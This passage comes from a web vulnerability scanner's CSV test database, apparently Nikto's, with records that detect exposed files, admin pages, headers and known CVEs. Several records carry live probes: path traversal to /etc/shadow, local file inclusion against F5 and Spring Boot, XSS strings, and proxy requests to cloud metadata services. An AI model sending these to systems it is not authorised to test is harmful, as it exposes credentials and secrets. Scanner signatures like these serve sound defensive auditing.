detected.\",\"\",\"\"\n\"007266\",\"\",\"3\",\"http://169.254.169.254/hetzner/v1/metadata/private-networks\",\"GET\",\"BODY:alias_ips:\",\"The Hetzner Cloud host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.\",\"\",\"Host: 169.254.169.254\\r\\n\"\n\"007267\",\"\",\"3\",\"http://192.0.0.192/latest/\",\"GET\",\"BODY:user\\-data\",\"The Oracle Cloud host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.\",\"\",\"Host: \\192.0.0.192\\r\\naccept: */*\\r\\nProxy-Connection: Keep-Alive\\r\\n\"\n\"007268\",\"\",\"3\",\"http://169.254.169.254/metadata/versions\",\"GET\",\"BODY:apiVersions&&CODE:200\",\"The Azure host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.\",\"\",\"Host: 169.254.169.254\\r\\naccept: */*\\r\\nMetadata: true\\r\\n\"\n\"007269\",\"CVE-2019-19781 https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/\",\"8\",\"/vpn/../vpns/cfg/smb.conf\",\"GET\",\"BODY:(?:name\\sresolve\\sorder|encrypt\\spasswords)\\s&&BODY:\\[global\\]&&CODE:200\",\"Citrix ADC and Citrix Gateway are vulnerable to a local file inclusion (LFI) vulnerability.\",\"\",\"\"\n\"007270\",\"\",\"23\",\"/whoAmI\",\"GET\",\"BODY:IsAuthenticated\",\"The Jenkins \\\"Who Am I?\\\" page is exposed and may reveal system/app information.\",\"\",\"\"\n\"007271\",\"\",\"3\",\"/.coveralls.yml\",\"GET\",\"BODY:repo_token\",\"A Coveralls.io file is exposed and contains a repository token, which could allow access to source control\",\"\",\"\"\n\"007272\",\"\",\"3\",\"/nginx_status\",\"GET\",\"BODY:Active\\sconn\",\"Nginx status page found\",\"\",\"\"\n\"007273\",\"\",\"3\",\"/Dockerfile\",\"GET\",\"BODY:FROM\\s&&BODY:ENTRYPOINT\\s&&BODY:ENV\\s\",\"Dockerfile found.\",\"\",\"\"\n\"007274\",\"\",\"3\",\"/cdn-cgi/trace\",\"GET\",\"BODY:visit_scheme=\",\"Cloudflare trace CGI found, which may leak some system information.\",\"\",\"\"\n\"007275\",\"https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html\",\"3\",\"/v1/tasks\",\"GET\",\"BODY:KnownStatus\",\"Amazon Elastic Container Service metadata URL found which may leak open ports and other information.\",\"\",\"\"\n\"007276\",\"https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html\",\"3\",\"/v2/tasks\",\"GET\",\"BODY:KnownStatus\",\"Amazon Elastic Container Service metadata URL found which may leak open ports and other information.\",\"\",\"\"\n\"007277\",\"https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html\",\"3\",\"/v3/tasks\",\"GET\",\"BODY:KnownStatus\",\"Amazon Elastic Container Service metadata URL found which may leak open ports and other information.\",\"\",\"\"\n\"007278\",\"https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html\",\"3\",\"/v4/tasks\",\"GET\",\"BODY:KnownStatus\",\"Amazon Elastic Container Service metadata URL found which may leak open ports and other information.\",\"\",\"\"\n\"007279\",\"\",\"23\",\"/.dockerignore\",\"GET\",\"CODE:200\",\".dockerignore file found. It may be possible to grasp the directory structure and learn more about the site.\",\"\",\"\"\n\"007280\",\"CVE-2020-5902\",\"7\",\"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=@LFI(nix,abs)\",\"GET\",\"BODY:\\{\\\"output\\\":\\\"&&@LFI()\",\"The F5 Big-IP's TMUI is vulnerable to a local file inclusion vulnerability and likely command exec.\",\"\",\"\"\n\"007281\",\"\",\"be\",\"/\",\"GET\",\"BODY:BIG\\-IP\\&reg\\;\\-\\sRedirect&&CODE:200\",\"F5 BIG-IP Traffic Management User Interface (TMUI) detected.\",\"\",\"\"\n\"007282\",\"\",\"1\",\"/var/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"/var directory has indexing enabled.\",\"\",\"\"\n\"007283\",\"\",\"1\",\"/var/log/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"/var directory has indexing enabled.\",\"\",\"\"\n\"007284\",\"\",\"1\",\"/etc/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"'/etc directory has indexing enabled.\",\"\",\"\"\n\"007285\",\"\",\"12\",\"/.ftpconfig\",\"GET\",\"BODY:\\\"port\\\":\",\"This file may contain login credentials.\",\"\",\"\"\n\"007286\",\"\",\"12\",\"/.remote-sync.json\",\"GET\",\"BODY:\\\"port\\\":\",\"This file may contain login credentials.\",\"\",\"\"\n\"007287\",\"\",\"12\",\"/.vscode/ftp-sync.json\",\"GET\",\"BODY:\\\"port\\\":\",\"This VSCode file may contain login credentials.\",\"\",\"\"\n\"007288\",\"\",\"12\",\"/.vscode/sftp.json\",\"GET\",\"BODY:\\\"port\\\":\",\"This VSCode file may contain login credentials.\",\"\",\"\"\n\"007289\",\"\",\"12\",\"/deployment-config.json\",\"GET\",\"BODY:\\\"port\\\":\",\"This file may contain login credentials.\",\"\",\"\"\n\"007290\",\"\",\"12\",\"/ftpsync.settings\",\"GET\",\"BODY:\\\"port\\\":\",\"This file may contain login credentials.\",\"\",\"\"\n\"007291\",\"\",\"12\",\"/sftp-config.json\",\"GET\",\"BODY:\\\"port\\\":\",\"This file may contain login credentials.\",\"\",\"\"\n\"007292\",\"\",\"1\",\"/Service/\",\"GET\",\"BODY:You have created a service\",\"WCF endpoint found.\",\"\",\"\"\n\"007293\",\"\",\"1\",\"/Services/\",\"GET\",\"BODY:You have created a service\",\"WCF endpoint found.\",\"\",\"\"\n\"007294\",\"\",\"1\",\"/Services/BackOfficeService.svc?wsdl\",\"GET\",\"BODY:You have created a service\",\"WCF endpoint found.\",\"\",\"\"\n\"007295\",\"\",\"1\",\"/Service/BackOfficeService.svc?wsdl\",\"GET\",\"BODY:You have created a service\",\"WCF endpoint found.\",\"\",\"\"\n\"007296\",\"\",\"1\",\"/Service/Service.svc\",\"GET\",\"BODY:You have created a service\",\"WCF endpoint found.\",\"\",\"\"\n\"007297\",\"\",\"1\",\"/Services/Service`.svc\",\"GET\",\"BODY:You have created a service\",\"WCF endpoint found.\",\"\",\"\"\n\"007298\",\"\",\"1\",\"/Service/Service1.svc\",\"GET\",\"BODY:You have created a service\",\"WCF endpoint found.\",\"\",\"\"\n\"007299\",\"\",\"1\",\"/Services/Service1`.svc\",\"GET\",\"BODY:You have created a service\",\"WCF endpoint found.\",\"\",\"\"\n\"007300\",\"\",\"1\",\"/BackOffice/Services/\",\"GET\",\"BODY:You have created a service\",\"WCF endpoint found.\",\"\",\"\"\n\"007301\",\"\",\"3\",\"/phpci.yml\",\"GET\",\"BODY:build_settings:\",\"PHP CI config file found.\",\"\",\"\"\n\"007302\",\"\",\"1\",\"/README.md\",\"GET\",\"CODE:200\",\"Readme Found\",\"\",\"\"\n\"007303\",\"CVE-2013-6235\",\"3\",\"/JAMonAdmin.jsp\",\"GET\",\"BODY:\\| JAMonAdmin \\|&&CODE:200\",\"JAMon - Java Application Monitor Admin interface identified. Versions 2.7 and earlier contain XSS vulnerabilities.\",\"\",\"\"\n\"007304\",\"CVE-2020-5902\",\"7\",\"/hsqldb;\",\"GET\",\"BODY:<title>HSQL Database Engine Servlet<\\/title>\",\"The F5 Big-IP's TMUI is vulnerable to a local file inclusion vulnerability and likely command exec.\",\"\",\"\"\n\"007305\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"23\",\"/shopdbtest.asp\",\"GET\",\"BODY:xDatabase\",\"VP-ASP shopping cart test application is available from the web. This page gives the location of .mdb files which may also be available (xDatabase).\",\"\",\"\"\n\"007306\",\"https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html\",\"2\",\"http://169.254.169.254/latest/meta-data/\",\"GET\",\"BODY:iam\\/\",\"The host is configured as a proxy which allows access to the AWS Meta-Data service. With some IAM role permissions this could allow significant access to the host/infrastructure.\",\"\",\"Host: 169.254.169.254\\r\\n\"\n\"007307\",\"https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html\",\"2\",\"http://169.254.169.254/latest/dynamic/instance-identity/document\",\"GET\",\"BODY:privateIp\",\"The AWS host is configured as a proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.\",\"\",\"Host: 169.254.169.254\\r\\n\"\n\"007308\",\"https://cloud.google.com/compute/docs/storing-retrieving-metadata\",\"2\",\"http://169.254.169.254/computeMetadata/v1/project/\",\"GET\",\"BODY:attributes\\/\",\"The Google Cloud Platform host is configured as a proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.\",\"\",\"Host: 169.254.169.254\\r\\nMetadata-Flavor: Google\"\n\"007309\",\"https://docs.openstack.org/nova/latest/admin/metadata-service.html\",\"2\",\"http://169.254.169.254/openstack/latest\",\"GET\",\"BODY:vendor_data\\.json\",\"The OpenStack host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.\",\"\",\"Host: 169.254.169.254\\r\\n\"\n\"007310\",\"https://developers.digitalocean.com/documentation/metadata/\",\"2\",\"http://169.254.169.254/metadata/v1.json\",\"GET\",\"BODY:droplet_id\",\"The DigitalOcean host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.\",\"\",\"Host: 169.254.169.254\\r\\n\"\n\"007311\",\"https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/\",\"2\",\"http://rancher-metadata/2015-07-25/\",\"GET\",\"BODY:containers\\/\",\"The Rancher host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.\",\"\",\"Host: \\rancher-metadata\\r\\n\"\n\"007312\",\"https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html\",\"2\",\"http://aws.cirt.net/latest/meta-data/\",\"GET\",\"BODY:iam\\/\",\"The host is configured as a proxy which allows access to the AWS Meta-Data service. With some IAM role permissions this could allow significant access to the host/infrastructure.\",\"\",\"Host: aws.cirt.net\\r\\n\"\n\"007313\",\"https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html\",\"2\",\"http://aws.cirt.net/latest/dynamic/instance-identity/document\",\"GET\",\"BODY:privateIp\",\"The AWS host is configured as a proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.\",\"\",\"Host: aws.cirt.net\\r\\n\"\n\"007314\",\"https://cloud.google.com/compute/docs/storing-retrieving-metadata\",\"2\",\"http://aws.cirt.net/computeMetadata/v1/project/\",\"GET\",\"BODY:attributes\\/\",\"The Google Cloud Platform host is configured as a proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.\",\"\",\"Host: aws.cirt.net\\r\\nMetadata-Flavor: Google\"\n\"007315\",\"https://docs.openstack.org/nova/latest/admin/metadata-service.html\",\"2\",\"http://aws.cirt.net/openstack/latest\",\"GET\",\"BODY:vendor_data\\.json\",\"The OpenStack host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.\",\"\",\"Host: aws.cirt.net\\r\\n\"\n\"007316\",\"https://developers.digitalocean.com/documentation/metadata/\",\"2\",\"http://aws.cirt.net/metadata/v1.json\",\"GET\",\"BODY:droplet_id\",\"The DigitalOcean host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.\",\"\",\"Host: aws.cirt.net\\r\\n\"\n\"007317\",\"\",\"3\",\"http://aws.cirt.net/metadata/instance?api-version=2017-08-01\",\"GET\",\"BODY:apiVersions&&CODE:200\",\"The Azure host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.\",\"\",\"Host: aws.cirt.net\\r\\n\"\n\"007318\",\"\",\"3\",\"http://aws.cirt.net/hetzner/v1/metadata/private-networks\",\"GET\",\"BODY:alias_ips:\",\"The Hetzner Cloud host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.\",\"\",\"Host: aws.cirt.net\\r\\n\"\n\"007319\",\"\",\"e\",\"/graphql\",\"GET\",\"BODY:GraphQL\\sPlayground\",\"The GraphQL Playground may allow direct querying of the database\",\"\",\"\"\n\"007320\",\"\",\"35\",\"/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\",\"GET\",\"BODY:INTERNAL_PASSWORD_ENABLED\",\"Cisco VPN host is vulnerable to CVE-2020-3452 which may allow disclosure oof information\",\"\",\"\"\n\"007321\",\"\",\"23\",\"@WORDPRESSwp-config.php\",\"GET\",\"BODY:DB_NAME\",\"wp-config.php file found without PHP processing. This file contains the database credentials.\",\"\",\"\"\n\"007322\",\"\",\"1\",\"/sellers.json\",\"GET\",\"BODY:\\\"seller_id\\\"&&BODY:\\\"domain\\\"\",\"The sellers.json file can reveal information about Google Adwords or other advertising networks in use.\",\"\",\"\"\n\"007323\",\"\",\"1\",\"/ads.txt\",\"GET\",\"BODY:DIRECT&&BODY:google\\.com,\",\"The ads.txt file can reveal information about Google Adwords or other advertising networks in use.\",\"\",\"\"\n\"007324\",\"https://webmin.com/\",\"be\",\"/session_login.cgi\",\"GET\",\"BODY:Webmin&&BODY:enter a username\",\"Webmin allows system administration via root login\",\"\",\"\"\n\"007325\",\"\",\"8\",\"/radio.php\",\"GET\",\"BODY:Login Page&&BODY:password\",\"PHP backdoor found.\",\"\",\"\"\n\"007326\",\"\",\"1\",\"/app-ads.txt\",\"GET\",\"BODY:DIRECT&&BODY:google\\.com,\",\"The ads.txt file can reveal information about Google Adwords or other advertising networks in use.\",\"\",\"\"\n\"007327\",\"RFC-5785\",\"3\",\"/.well-known/jwks\",\"GET\",\"BODY:keys&&BODY:kty\",\"JWKS file found\",\"\",\"\"\n\"007328\",\"https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/certificate-authority-web-enrollment\",\"1\",\"/certsrv/certfnsh.asp\",\"GET\",\"BODY:Active Directory Certificate Services&&CODE:200\",\"Active Directory Certificate Services found\",\"\",\"\"\n\"007329\",\"https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/certificate-authority-web-enrollment\",\"1\",\"/certsrv/certfnsh.asp\",\"GET\",\"CODE:401\",\"Active Directory Certificate Services found (requires authentication)\",\"\",\"\"\n\"007330\",\"https://getcomposer.org/\",\"23\",\"/vendor/composer/installed.json\",\"GET\",\"BODY:\\\"(?:require|name)\\\":\\s\",\"PHP Composer configuration file reveals configuration information.\",\"\",\"\"\n\"007331\",\"https://getcomposer.org/\",\"23\",\"/.composer/composer.json\",\"GET\",\"BODY:\\\"(?:require|name)\\\":\\s\",\"PHP Composer configuration file reveals configuration information.\",\"\",\"\"\n\"007332\",\"https://swagger.io/\",\"e3\",\"/swagger/index.html\",\"GET\",\"BODY:Swagger UI\",\"Swagger UI was found.\",\"\",\"\"\n\"007333\",\"https://graphql.org/\",\"e3\",\"/graphql\",\"GET\",\"BODY:category\\\"\\:\\\"graphql\",\"GraphQL endpoint found\",\"\",\"\"\n\"007334\",\"https://cockpit-project.org/\",\"b\",\"/\",\"GET\",\"BODY:Cockpit\\sfrom\\srunning\",\"Cockpit server admin is running.\",\"\",\"\"\n\"007335\",\"https://tomcat.apache.org/connectors-doc/common_howto/workers.html\",\"3\",\"/jkmanager;?cmd=list&w=wlb\",\"GET\",\"BODY:JK Status Manager\",\"Apache mod_jk status page is available.\",\"\",\"\"\n\"007336\",\"CVE-2018-1000129,https://github.com/pyn3rd/Spring-Boot-Vulnerability?tab=readme-ov-file\",\"4\",\"/actuator/jolokia/read%3Csvg%20onload=alert(1123323)%3E?mimeType=text/html\",\"GET\",\"BODY:onload=alert(1123323)>&&CODE:200\",\"SpringBoot Jolokia XSS.\",\"\",\"\"\n\"007337\",\"https://pi-hole.net/\",\"e\",\"/admin/login\",\"GET\",\"BODY:Pi\\-hole\",\"Pi-hole admin was found.\",\"\",\"\"\n\"007338\",\"https://github.com/pyn3rd/Spring-Boot-Vulnerability?tab=readme-ov-file\",\"8\",\"/actuator/env/spring.jmx.enabled\",\"GET\",\"BODY:propertySources:&&CODE:200\",\"SpringBoot JMX enabled.\",\"\",\"\"\n\"007339\",\"CVE-2021-21234,https://github.com/pyn3rd/Spring-Boot-Vulnerability?tab=readme-ov-file\",\"7\",\"/manage/log/view?filename=@LFI(nix,abs)&base=../../../../../\",\"GET\",\"CODE:200&&@LFI()\",\"SpringBoot JMX enabled.\",\"\",\"\"\n\"007340\",\"CVE-2006-3918\",\"4\",\"/\",\"GET\",\"BODY:<script>alert\\(xss\\)<\\/script>\",\"Apache Expect header XSS.\",\"\",\"Expect: <script>alert(xss)</script>\"\n\"007341\",\"CVE-2017-7240\",\"7\",\"/../../../../../../../../../../../../etc/shadow\",\"GET\",\"BODY:root:\\$1\",\"Miele Professional PST10 directory traversal\",\"\",\"\"\n\"007342\",\"https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/X-Frame-Options\",\"2\",\"/\",\"GET\",\"!HEADER:x-frame-options\",\"X-Frame-Options header is deprecated and was replaced with the Content-Security-Policy HTTP header with the frame-ancestors directive.\",\"\",\"\"\n\"007343\",\"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Expect-CT\",\"2\",\"/\",\"GET\",\"HEADER:expect-ct: [^1]\",\"The Expect-CT header is deprecated and was replaced with Signed Certificate Timestamps (SCTs).\",\"\",\"\"\n\"007344\",\"https://www.imperva.com/products/web-application-firewall-waf/\",\"2\",\"/\",\"GET\",\"HEADER:x-cdn: Incapsula\",\"Incapsula (Imperva) WAF is in use.\",\"\",\"\"\n\"007345\",\"https://www.netiq.com/documentation/netiqaccessmanager32/accessgatewayhelp/data/agsglobaladv.html\",\"2\",\"/\",\"GET\",\"HEADER:x-mag\",\"NetIQ debug information is enabled.\",\"\",\"\"\n\"007346\",\"https://druapl.org/\",\"2\",\"/\",\"GET\",\"HEADER:x-drupal-cache\",\"Drupal was identified via the x-drupal-cache header.\",\"\",\"\"\n\"007347\",\"https://druapl.org/\",\"2\",\"/\",\"GET\",\"HEADER:x-generator\",\"Drupal was identified via the x-generator header.\",\"\",\"\"\n\"007348\",\"https://druapl.org/\",\"2\",\"/\",\"GET\",\"HEADER:x-drupal-dynamic-cache\",\"Drupal was identified via the x-drupal-dynamic-cache header.\",\"\",\"\"\n\"007349\",\"https://www.fastly.com/documentation/reference/http/http-headers/X-Timer/\",\"2\",\"/\",\"GET\",\"HEADER:x-timer\",\"Fastly CDN was identified by the x-timer header.\",\"\",\"\"\n\"007350\",\"https://www.fastly.com/documentation/reference/vcl/statements/restart/\",\"2\",\"/\",\"GET\",\"HEADER:fastly-restarts\",\"Fastly CDN was identified by the fastly-restarts header.\",\"\",\"\"\n\"007351\",\"https://answers.netlify.com/t/support-guide-netlify-support-asked-for-the-x-nf-request-id-header-what-is-it-and-how-do-i-find-it/4385\",\"2\",\"/\",\"GET\",\"HEADER:x-nf-request-id\",\"Netlify was identified by the x-nf-request-id header.\",\"\",\"\"\n\"007352\",\"https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/\",\"2\",\"/\",\"GET\",\"!HEADER:x-content-type:nosniff\",\"The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.\",\"\",\"\"\n\"007353\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"b\",\"/@JUNK(7).nsf\",\"GET\",\"CODE:404&&BODY:HTTP\\sWeb\\sServer:IBM\\sNotes\\sException\",\"Lotus Domino identifed via the 404 error message.\",\"\",\"\"\n\"007354\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"be\",\"/admin.nsf\",\"GET\",\"CODE:200&&BODY:Server\\sLogin|self\\.\\_domino_name\",\"Lotus Domino login page found.\",\"\",\"\"\n\"007355\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"be\",\"/admin4.nsf\",\"GET\",\"CODE:200&&BODY:Server\\sLogin|self\\.\\_domino_name\",\"Lotus Domino login page found.\",\"\",\"\"\n\"007356\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"be\",\"/admin5.nsf\",\"GET\",\"CODE:200&&BODY:Server\\sLogin|self\\.\\_domino_name\",\"Lotus Domino login page found.\",\"\",\"\"\n\"007357\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"be\",\"/webadmin.nsf\",\"GET\",\"CODE:200&&BODY:Server\\sLogin|self\\.\\_domino_name\",\"Lotus Domino login page found.\",\"\",\"\"\n\"007358\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"be\",\"/domcfg.nsf\",\"GET\",\"CODE:200&&BODY:Server\\sLogin|self\\.\\_domino_name\",\"Lotus Domino login page found.\",\"\",\"\"\n\"007359\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"be\",\"/download/filesets/n_LOTUS_SCRIPT.inf\",\"GET\",\"CODE:200&&BODY:Version\\=([0-9.]+)|Domino\\sRelease\\s([0-9A-Z.]+)\",\"Lotus Domino version $1 found.\",\"\",\"\"\n\"007360\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"be\",\"/download/filesets/l_SEARCH.inf\",\"GET\",\"CODE:200&&BODY:Version\\=([0-9.]+)|Domino\\sRelease\\s([0-9A-Z.]+)\",\"Lotus Domino version $1 found.\",\"\",\"\"\n\"007361\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"be\",\"/download/filesets/n_SEARCH.inf\",\"GET\",\"CODE:200&&BODY:Version\\=([0-9.]+)|Domino\\sRelease\\s([0-9A-Z.]+)\",\"Lotus Domino version $1 found.\",\"\",\"\"\n\"007362\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"be\",\"/iNotes/Forms5.nsf\",\"GET\",\"CODE:200&&BODY:Version\\=([0-9.]+)|Domino\\sRelease\\s([0-9A-Z.]+)\",\"Lotus Domino version $1 found.\",\"\",\"\"\n\"007363\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"be\",\"/iNotes/Forms6.nsf\",\"GET\",\"CODE:200&&BODY:Version\\=([0-9.]+)|Domino\\sRelease\\s([0-9A-Z.]+)\",\"Lotus Domino version $1 found.\",\"\",\"\"\n\"007364\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"be\",\"/iNotes/Forms7.nsf\",\"GET\",\"CODE:200&&BODY:Version\\=([0-9.]+)|Domino\\sRelease\\s([0-9A-Z.]+)\",\"Lotus Domino version $1 found.\",\"\",\"\"\n\"007365\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/catalog.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"A list of server databases can be retrieved, as well as a list of ACLs.\",\"\",\"\"\n\"007366\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/cersvr.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"Server certificate data can be accessed remotely.\",\"\",\"\"\n\"007367\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/domlog.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"The domain server logs can be accessed remotely.\",\"\",\"\"\n\"007368\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/events4.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"The events log can be accessed remotely.\",\"\",\"\"\n\"007369\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/log.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"The server log is remotely accessible.\",\"\",\"\"\n\"007370\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/names.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"User names and groups can be accessed remotely (possibly password hashes as well)\",\"\",\"\"\n\"007371\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/hidden.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication. Common database name.\",\"\",\"\"\n\"007372\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/setup.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"The server can be configured remotely, or current setup can be downloaded.\",\"\",\"\"\n\"007373\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/statrep.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"Any reports generated by the admins can be retrieved.\",\"\",\"\"\n\"007374\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/webadmin.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"The server admin database can be accessed remotely.\",\"\",\"\"\n\"007375\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/dba4.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This Lotus Domino page contains database views that disclose sensitive information.\",\"\",\"\"\n\"007376\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/account.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007377\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/accounts.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007378\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/admin.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007379\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/admin4.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007380\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/admin5.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007381\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/agentrunner.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive 